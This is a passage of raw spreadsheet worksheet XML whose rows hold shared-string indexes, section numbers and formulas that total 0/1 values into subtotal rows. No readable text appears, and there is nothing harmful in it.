      <c r="C68" t="s">
        <v>389</v>
      </c>
      <c r="D68" t="s">
        <v>32</v>
      </c>
      <c r="E68" t="s">
        <v>6</v>
      </c>
      <c r="F68" s="1" t="s">
        <v>390</v>
      </c>
      <c r="G68" s="1" t="s">
        <v>391</v>
      </c>
      <c r="J68">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L68">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M68">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="69" spans="2:13" x14ac:dyDescent="0.35">
      <c r="C69" t="s">
        <v>392</v>
      </c>
      <c r="D69" t="s">
        <v>49</v>
      </c>
      <c r="E69" t="s">
        <v>6</v>
      </c>
      <c r="F69" s="1" t="s">
        <v>393</v>
      </c>
      <c r="G69" s="1" t="s">
        <v>394</v>
      </c>
    </row>
    <row r="70" spans="2:13" ht="58" x14ac:dyDescent="0.35">
      <c r="B70" t="s">
        <v>176</v>
      </c>
      <c r="C70" t="s">
        <v>178</v>
      </c>
      <c r="D70" t="s">
        <v>49</v>
      </c>
      <c r="E70" t="s">
        <v>6</v>
      </c>
      <c r="F70" s="1" t="s">
        <v>177</v>
      </c>
      <c r="G70" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J70">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L70">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M70">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="71" spans="2:13" ht="72.5" x14ac:dyDescent="0.35">
      <c r="C71" t="s">
        <v>182</v>
      </c>
      <c r="D71" t="s">
        <v>49</v>
      </c>
      <c r="E71" t="s">
        <v>6</v>
      </c>
      <c r="F71" s="1" t="s">
        <v>180</v>
      </c>
      <c r="G71" s="1" t="s">
        <v>181</v>
      </c>
      <c r="J71">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L71">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M71">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="72" spans="2:13" x14ac:dyDescent="0.35">
      <c r="B72" t="s">
        <v>113</v>
      </c>
      <c r="H72" s="5" t="s">
        <v>395</v>
      </c>
      <c r="J72">
        <f ca="1">SUM(J37:J39)</f>
        <v>1</v>
      </c>
      <c r="L72">
        <f ca="1">SUM(L37:L39)</f>
        <v>1</v>
      </c>
      <c r="M72">
        <f ca="1">SUM(M37:M39)</f>
        <v>2</v>
      </c>
    </row>
    <row r="73" spans="2:13" x14ac:dyDescent="0.35">
      <c r="B73" t="s">
        <v>183</v>
      </c>
      <c r="C73" t="s">
        <v>185</v>
      </c>
      <c r="D73" t="s">
        <v>49</v>
      </c>
      <c r="E73" t="s">
        <v>6</v>
      </c>
      <c r="F73" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J73">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L73">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M73">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="74" spans="2:13" ht="58" x14ac:dyDescent="0.35">
      <c r="B74" t="s">
        <v>186</v>
      </c>
      <c r="C74" t="s">
        <v>187</v>
      </c>
      <c r="D74" t="s">
        <v>32</v>
      </c>
      <c r="E74" t="s">
        <v>6</v>
      </c>
      <c r="F74" s="1" t="s">
        <v>188</v>
      </c>
      <c r="G74" s="1" t="s">
        <v>189</v>
      </c>
      <c r="J74">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L74">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M74">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="75" spans="2:13" ht="29" x14ac:dyDescent="0.35">
      <c r="C75" t="s">
        <v>190</v>
      </c>
      <c r="D75" t="s">
        <v>49</v>
      </c>
      <c r="E75" t="s">
        <v>6</v>
      </c>
      <c r="F75" s="1" t="s">
        <v>191</v>
      </c>
      <c r="G75" s="1" t="s">
        <v>192</v>
      </c>
      <c r="J75">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L75">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M75">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="2:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="C76" t="s">
        <v>193</v>
      </c>
      <c r="D76" t="s">
        <v>49</v>
      </c>
      <c r="E76" t="s">
        <v>6</v>
      </c>
      <c r="F76" s="1" t="s">
        <v>194</v>
      </c>
      <c r="G76" s="1" t="s">
        <v>195</v>
      </c>
      <c r="J76">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L76">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M76">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="77" spans="2:13" ht="87" x14ac:dyDescent="0.35">
      <c r="C77" t="s">
        <v>196</v>
      </c>
      <c r="D77" t="s">
        <v>32</v>
      </c>
      <c r="E77" t="s">
        <v>9</v>
      </c>
      <c r="F77" s="1" t="s">
        <v>197</v>
      </c>
      <c r="G77" s="1" t="s">
        <v>198</v>
      </c>
      <c r="J77">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L77">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M77">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="2:13" ht="58" x14ac:dyDescent="0.35">
      <c r="B78" t="s">
        <v>199</v>
      </c>
      <c r="C78" t="s">
        <v>200</v>
      </c>
      <c r="D78" t="s">
        <v>49</v>
      </c>
      <c r="E78" t="s">
        <v>6</v>
      </c>
      <c r="F78" s="1" t="s">
        <v>201</v>
      </c>
      <c r="G78" s="1" t="s">
        <v>202</v>
      </c>
      <c r="J78">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L78">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M78">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="2:13" ht="58" x14ac:dyDescent="0.35">
      <c r="C79" t="s">
        <v>200</v>
      </c>
      <c r="D79" t="s">
        <v>49</v>
      </c>
      <c r="E79" t="s">
        <v>9</v>
      </c>
      <c r="F79" s="1" t="s">
        <v>203</v>
      </c>
      <c r="G79" s="1" t="s">
        <v>204</v>
      </c>
      <c r="J79">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L79">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M79">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="2:13" ht="38.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C80" t="s">
        <v>205</v>
      </c>
      <c r="D80" t="s">
        <v>49</v>
      </c>
      <c r="E80" t="s">
        <v>9</v>
      </c>
      <c r="F80" s="1" t="s">
        <v>206</v>
      </c>
      <c r="G80" s="1" t="s">
        <v>207</v>
      </c>
      <c r="J80">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L80">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M80">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="81" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B81" t="s">
        <v>208</v>
      </c>
      <c r="C81" t="s">
        <v>209</v>
      </c>
      <c r="D81" t="s">
        <v>49</v>
      </c>
      <c r="E81" t="s">
        <v>6</v>
      </c>
      <c r="F81" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J81">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L81">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M81">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="82" spans="1:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A82" s="3">
        <v>12.04</v>
      </c>
      <c r="B82" t="s">
        <v>211</v>
      </c>
      <c r="C82" t="s">
        <v>360</v>
      </c>
      <c r="D82" t="s">
        <v>49</v>
      </c>
      <c r="E82" t="s">
        <v>9</v>
      </c>
      <c r="F82" s="1" t="s">
        <v>359</v>
      </c>
      <c r="H82" t="s">
        <v>361</v>
      </c>
      <c r="J82">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L82">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M82">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="83" spans="1:13" ht="42.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B83" t="s">
        <v>212</v>
      </c>
      <c r="C83" t="s">
        <v>213</v>
      </c>
      <c r="D83" t="s">
        <v>32</v>
      </c>
      <c r="E83" t="s">
        <v>124</v>
      </c>
      <c r="F83" s="1" t="s">
        <v>214</v>
      </c>
      <c r="J83">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L83">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M83">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="84" spans="1:13" x14ac:dyDescent="0.35">
      <c r="C84" t="s">
        <v>215</v>
      </c>
      <c r="D84" t="s">
        <v>32</v>
      </c>
      <c r="E84" t="s">
        <v>6</v>
      </c>
      <c r="F84" s="1" t="s">
        <v>216</v>
      </c>
      <c r="J84">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L84">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M84">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="85" spans="1:13" x14ac:dyDescent="0.35">
      <c r="C85" t="s">
        <v>217</v>
      </c>
      <c r="D85" t="s">
        <v>32</v>
      </c>
      <c r="E85" t="s">
        <v>6</v>
      </c>
      <c r="F85" s="1" t="s">
        <v>218</v>
      </c>
      <c r="J85">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L85">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M85">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="86" spans="1:13" x14ac:dyDescent="0.35">
      <c r="C86" t="s">
        <v>219</v>
      </c>
      <c r="D86" t="s">
        <v>32</v>
      </c>
      <c r="E86" t="s">
        <v>9</v>
      </c>
      <c r="F86" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J86">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L86">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M86">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="87" spans="1:13" ht="29" x14ac:dyDescent="0.35">
      <c r="C87" t="s">
        <v>221</v>
      </c>
      <c r="D87" t="s">
        <v>32</v>
      </c>
      <c r="E87" t="s">
        <v>6</v>
      </c>
      <c r="F87" s="1" t="s">
        <v>222</v>
      </c>
      <c r="J87">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L87">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M87">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="88" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B88" t="s">
        <v>131</v>
      </c>
      <c r="H88" s="5" t="s">
        <v>395</v>
      </c>
      <c r="J88">
        <f ca="1">SUM(J61:J62)</f>
        <v>0</v>
      </c>
      <c r="L88">
        <f ca="1">SUM(L61:L62)</f>
        <v>1</v>
      </c>
      <c r="M88">
        <f ca="1">SUM(M61:M62)</f>
        <v>1</v>
      </c>
    </row>
    <row r="89" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B89" t="s">
        <v>56</v>
      </c>
      <c r="H89" s="5" t="s">
        <v>395</v>
      </c>
      <c r="J89">
        <f ca="1">SUM(J19:J21)</f>
        <v>2</v>
      </c>
      <c r="L89">
        <f ca="1">SUM(L19:L21)</f>
        <v>2</v>
      </c>
      <c r="M89">
        <f ca="1">SUM(M19:M21)</f>
        <v>3</v>
      </c>
    </row>
    <row r="90" spans="1:13" ht="36.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A90" s="3">
        <v>12.05</v>
      </c>
      <c r="B90" t="s">
        <v>228</v>
      </c>
      <c r="C90" t="s">
        <v>229</v>
      </c>
      <c r="D90" t="s">
        <v>49</v>
      </c>
      <c r="E90" t="s">
        <v>6</v>
      </c>
      <c r="F90" s="1" t="s">
        <v>230</v>
      </c>
      <c r="J90">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L90">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M90">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="91" spans="1:13" ht="34" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C91" t="s">
        <v>229</v>
      </c>
      <c r="D91" t="s">
        <v>49</v>
      </c>
      <c r="E91" t="s">
        <v>9</v>
      </c>
      <c r="F91" s="1" t="s">
        <v>231</v>
      </c>
      <c r="J91">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L91">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M91">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="92" spans="1:13" x14ac:dyDescent="0.35">
      <c r="C92" t="s">
        <v>229</v>
      </c>
      <c r="D92" t="s">
        <v>32</v>
      </c>
      <c r="E92" t="s">
        <v>6</v>
      </c>
      <c r="F92" s="1" t="s">
        <v>232</v>
      </c>
      <c r="J92">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L92">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M92">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="93" spans="1:13" ht="29" x14ac:dyDescent="0.35">
      <c r="C93" t="s">
        <v>233</v>
      </c>
      <c r="D93" t="s">
        <v>234</v>
      </c>
      <c r="E93" t="s">
        <v>6</v>
      </c>
      <c r="F93" s="1" t="s">
        <v>235</v>
      </c>
      <c r="J93">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L93">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M93">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="94" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B94" t="s">
        <v>175</v>
      </c>
      <c r="H94" s="5" t="s">
        <v>388</v>
      </c>
      <c r="J94">
        <f ca="1">SUM(J68:J69)</f>
        <v>1</v>
      </c>
      <c r="L94">
        <f ca="1">SUM(L68:L69)</f>
        <v>0</v>
      </c>
      <c r="M94">
        <f ca="1">SUM(M68:M69)</f>
        <v>1</v>
      </c>
    </row>
    <row r="95" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B95" t="s">
        <v>21</v>
      </c>
      <c r="H95" s="5" t="s">
        <v>396</v>
      </c>
      <c r="J95">
        <f ca="1">SUM(J6:J9)</f>
        <v>3</v>
      </c>
      <c r="L95">
        <f ca="1">SUM(L6:L9)</f>
        <v>2</v>
      </c>
      <c r="M95">
        <f ca="1">SUM(M6:M9)</f>
        <v>3</v>
      </c>
    </row>
    <row r="96" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B96" t="s">
        <v>131</v>
      </c>
      <c r="H96" s="5" t="s">
        <v>395</v>
      </c>
      <c r="J96">
        <f ca="1">SUM(J51:J53)</f>
        <v>1</v>
      </c>
      <c r="L96">
        <f ca="1">SUM(L51:L53)</f>
        <v>2</v>
      </c>
      <c r="M96">
        <f ca="1">SUM(M51:M53)</f>
        <v>2</v>
      </c>
    </row>
    <row r="97" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B97" t="s">
        <v>67</v>
      </c>
      <c r="H97" s="5" t="s">
        <v>397</v>
      </c>
      <c r="J97">
        <f ca="1">SUM(J68:J69)</f>
        <v>1</v>
      </c>
      <c r="L97">
        <f ca="1">SUM(L68:L69)</f>
        <v>0</v>
      </c>
      <c r="M97">
        <f ca="1">SUM(M68:M69)</f>
        <v>1</v>
      </c>
    </row>
    <row r="98" spans="1:13" x14ac:dyDescent="0.35">
      <c r="A98" s="3">
        <v>12.06</v>
      </c>
      <c r="B98" t="s">
        <v>228</v>
      </c>
      <c r="H98" s="5" t="s">
        <v>396</v>
      </c>
      <c r="J98">
        <f ca="1">SUM(J90:J93)</f>
        <v>2</v>
      </c>
      <c r="L98">
        <f ca="1">SUM(L90:L93)</f>
        <v>2</v>
      </c>
      <c r="M98">
        <f ca="1">SUM(M90:M93)</f>
        <v>3</v>
      </c>
    </row>
    <row r="99" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B99" t="s">
        <v>175</v>
      </c>
      <c r="H99" s="5" t="s">
        <v>388</v>
      </c>
      <c r="J99">
        <f ca="1">SUM(J68:J69)</f>
        <v>1</v>
      </c>
      <c r="L99">
        <f ca="1">SUM(L68:L69)</f>
        <v>0</v>
      </c>
      <c r="M99">
        <f ca="1">SUM(M68:M69)</f>
        <v>1</v>
      </c>
    </row>
    <row r="100" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B100" t="s">
        <v>21</v>
      </c>
      <c r="H100" s="5" t="s">
        <v>396</v>
      </c>
      <c r="J100">
        <f ca="1">SUM(J6:J9)</f>
        <v>3</v>
      </c>
      <c r="L100">
        <f ca="1">SUM(L6:L9)</f>
        <v>2</v>
      </c>
      <c r="M100">
        <f ca="1">SUM(M6:M9)</f>
        <v>3</v>
      </c>
    </row>
    <row r="101" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B101" t="s">
        <v>131</v>
      </c>
      <c r="H101" s="5" t="s">
        <v>395</v>
      </c>
      <c r="J101">
        <f ca="1">SUM(J51:J53)</f>
        <v>1</v>
      </c>
      <c r="L101">
        <f ca="1">SUM(L51:L53)</f>
        <v>2</v>
      </c>
      <c r="M101">
        <f ca="1">SUM(M51:M53)</f>
        <v>2</v>
      </c>
    </row>
    <row r="102" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B102" t="s">
        <v>67</v>
      </c>
      <c r="H102" s="5" t="s">
        <v>397</v>
      </c>
      <c r="J102">
        <f ca="1">SUM(J68:J69)</f>
        <v>1</v>
      </c>
      <c r="L102">
        <f ca="1">SUM(L68:L69)</f>
        <v>0</v>
      </c>
      <c r="M102">
        <f ca="1">SUM(M68:M69)</f>
        <v>1</v>
      </c>
    </row>
    <row r="103" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B103" t="s">
        <v>56</v>
      </c>
      <c r="H103" s="5" t="s">
        <v>395</v>
      </c>
      <c r="J103">
        <f ca="1">SUM(J19:J21)</f>
        <v>2</v>
      </c>
      <c r="L103">
        <f ca="1">SUM(L19:L21)</f>
        <v>2</v>
      </c>
      <c r="M103">
        <f ca="1">SUM(M19:M21)</f>
        <v>3</v>
      </c>
    </row>
    <row r="104" spans="1:13" ht="29" x14ac:dyDescent="0.35">
      <c r="B104" t="s">
        <v>223</v>
      </c>
      <c r="C104" t="s">
        <v>224</v>
      </c>
      <c r="D104" t="s">
        <v>49</v>
      </c>
      <c r="E104" t="s">
        <v>6</v>
      </c>
      <c r="F104" s="1" t="s">
        <v>225</v>
      </c>
      <c r="J104">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L104">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M104">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="105" spans="1:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="C105" t="s">
        <v>226</v>
      </c>
      <c r="D105" t="s">
        <v>49</v>
      </c>
      <c r="E105" t="s">
        <v>9</v>
      </c>
      <c r="F105" s="1" t="s">
        <v>313</v>
      </c>
      <c r="J105">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L105">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M105">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="106" spans="1:13" ht="29" x14ac:dyDescent="0.35">
      <c r="C106" t="s">
        <v>226</v>
      </c>
      <c r="D106" t="s">
        <v>49</v>
      </c>
      <c r="E106" t="s">
        <v>9</v>
      </c>
      <c r="F106" s="1" t="s">
        <v>227</v>
      </c>
      <c r="J106">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L106">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M106">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="107" spans="1:13" ht="46" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A107" s="3">
        <v>12.07</v>
      </c>
      <c r="B107" t="s">
        <v>242</v>
      </c>
      <c r="C107" t="s">
        <v>245</v>
      </c>
      <c r="D107" t="s">
        <v>49</v>
      </c>
      <c r="E107" t="s">
        <v>124</v>
      </c>
      <c r="F107" s="1" t="s">
        <v>244</v>
      </c>
      <c r="G107" t="s">
        <v>243</v>
      </c>
      <c r="J107">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L107">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M107">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="108" spans="1:13" ht="38" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B108" t="s">
        <v>246</v>
      </c>
      <c r="C108" t="s">
        <v>248</v>
      </c>
      <c r="D108" t="s">
        <v>49</v>
      </c>
      <c r="E108" t="s">
        <v>9</v>
      </c>
      <c r="F108" s="1" t="s">
        <v>247</v>
      </c>
      <c r="J108">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L108">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M108">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="109" spans="1:13" ht="29" x14ac:dyDescent="0.35">
      <c r="B109" t="s">
        <v>249</v>
      </c>
      <c r="C109" t="s">
        <v>250</v>
      </c>
      <c r="D109" t="s">
        <v>49</v>
      </c>
      <c r="E109" t="s">
        <v>6</v>
      </c>
      <c r="F109" s="1" t="s">
        <v>251</v>
      </c>
      <c r="J109">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L109">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M109">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="110" spans="1:13" x14ac:dyDescent="0.35">
      <c r="C110" t="s">
        <v>252</v>
      </c>
      <c r="D110" t="s">
        <v>49</v>
      </c>
      <c r="E110" t="s">
        <v>6</v>
      </c>
      <c r="F110" s="1" t="s">
        <v>253</v>
      </c>
      <c r="J110">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L110">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M110">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="111" spans="1:13" x14ac:dyDescent="0.35">
      <c r="C111" t="s">
        <v>254</v>
      </c>
      <c r="D111" t="s">
        <v>49</v>
      </c>
      <c r="E111" t="s">
        <v>6</v>
      </c>
      <c r="F111" s="1" t="s">
        <v>255</v>
      </c>
      <c r="J111">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L111">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M111">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="112" spans="1:13" x14ac:dyDescent="0.35">
      <c r="A112" s="3">
        <v>12.007999999999999</v>
      </c>
      <c r="B112" t="s">
        <v>55</v>
      </c>
      <c r="H112" s="5" t="s">
        <v>398</v>
      </c>
      <c r="J112">
        <f ca="1">J18</f>
        <v>1</v>
      </c>
      <c r="L112">
        <f t="shared" ref="L112:M112" ca="1" si="4">L18</f>
        <v>0</v>
      </c>
      <c r="M112">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="113" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B113" t="s">
        <v>242</v>
      </c>
      <c r="H113" s="5" t="s">
        <v>398</v>
      </c>
      <c r="J113">
        <f ca="1">J107</f>
        <v>1</v>
      </c>
      <c r="L113">
        <f t="shared" ref="L113:M113" ca="1" si="5">L107</f>
        <v>0</v>
      </c>
      <c r="M113">
        <f t="shared" ca="1" si="5"/>
        <v>1</v>
      </c>
    </row>
    <row r="114" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B114" t="s">
        <v>246</v>
      </c>
      <c r="H114" s="5" t="s">
        <v>398</v>
      </c>
      <c r="J114">
        <f ca="1">J108</f>
        <v>1</v>
      </c>
      <c r="L114">
        <f t="shared" ref="L114:M114" ca="1" si="6">L108</f>
        <v>1</v>
      </c>
      <c r="M114">
        <f t="shared" ca="1" si="6"/>
        <v>1</v>
      </c>
    </row>
    <row r="115" spans="1:13" ht="26.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A115" s="4">
        <v>13.01</v>
      </c>
      <c r="B115" t="s">
        <v>362</v>
      </c>
      <c r="C115" t="s">
        <v>363</v>
      </c>
      <c r="D115" t="s">
        <v>32</v>
      </c>
      <c r="E115" t="s">
        <v>9</v>
      </c>
      <c r="F115" s="1" t="s">
        <v>364</v>
      </c>
      <c r="J115">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L115">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M115">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="116" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B116" t="s">
        <v>114</v>
      </c>
      <c r="H116" s="5" t="s">
        <v>398</v>
      </c>
      <c r="J116">
        <f ca="1">J40</f>
        <v>0</v>
      </c>
      <c r="L116">
        <f t="shared" ref="L116:M116" ca="1" si="7">L40</f>
        <v>0</v>
      </c>
      <c r="M116">
        <f t="shared" ca="1" si="7"/>
        <v>1</v>
      </c>
    </row>
    <row r="117" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B117" t="s">
        <v>105</v>
      </c>
      <c r="H117" s="5" t="s">
        <v>395</v>
      </c>
      <c r="J117">
        <f ca="1">SUM(J33:J35)</f>
        <v>1</v>
      </c>
      <c r="L117">
        <f ca="1">SUM(L33:L35)</f>
        <v>1</v>
      </c>
      <c r="M117">
        <f ca="1">SUM(M33:M35)</f>
        <v>0</v>
      </c>
    </row>
    <row r="118" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B118" t="s">
        <v>128</v>
      </c>
      <c r="H118" s="5" t="s">
        <v>388</v>
      </c>
      <c r="J118">
        <f ca="1">SUM(J47:J48)</f>
        <v>0</v>
      </c>
      <c r="L118">
        <f ca="1">SUM(L47:L48)</f>
        <v>0</v>
      </c>
      <c r="M118">
        <f ca="1">SUM(M47:M48)</f>
        <v>2</v>
      </c>
    </row>
    <row r="119" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B119" t="s">
        <v>129</v>
      </c>
      <c r="H119" s="5" t="s">
        <v>398</v>
      </c>
      <c r="J119">
        <f ca="1">J48</f>
        <v>0</v>
      </c>
      <c r="L119">
        <f ca="1">L48</f>
        <v>0</v>
      </c>
      <c r="M119">
        <f ca="1">M48</f>
        <v>1</v>
      </c>
    </row>
    <row r="120" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B120" t="s">
        <v>130</v>
      </c>
      <c r="H120" s="5" t="s">
        <v>398</v>
      </c>
      <c r="J120">
        <f ca="1">J49</f>
        <v>1</v>
      </c>
      <c r="L120">
        <f ca="1">L49</f>
        <v>0</v>
      </c>
      <c r="M120">
        <f ca="1">M49</f>
        <v>0</v>
      </c>
    </row>
    <row r="121" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B121" t="s">
        <v>256</v>
      </c>
      <c r="C121" t="s">
        <v>258</v>
      </c>
      <c r="D121" t="s">
        <v>32</v>
      </c>
      <c r="E121" t="s">
        <v>6</v>
      </c>
      <c r="F121" t="s">
        <v>257</v>
      </c>
      <c r="G121" t="s">
        <v>259</v>
      </c>
      <c r="J121">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L121">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M121">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="122" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B122" t="s">
        <v>118</v>
      </c>
      <c r="H122" s="5" t="s">
        <v>388</v>
      </c>
      <c r="J122">
        <f ca="1">SUM(J41:J42)</f>
        <v>1</v>
      </c>
      <c r="L122">
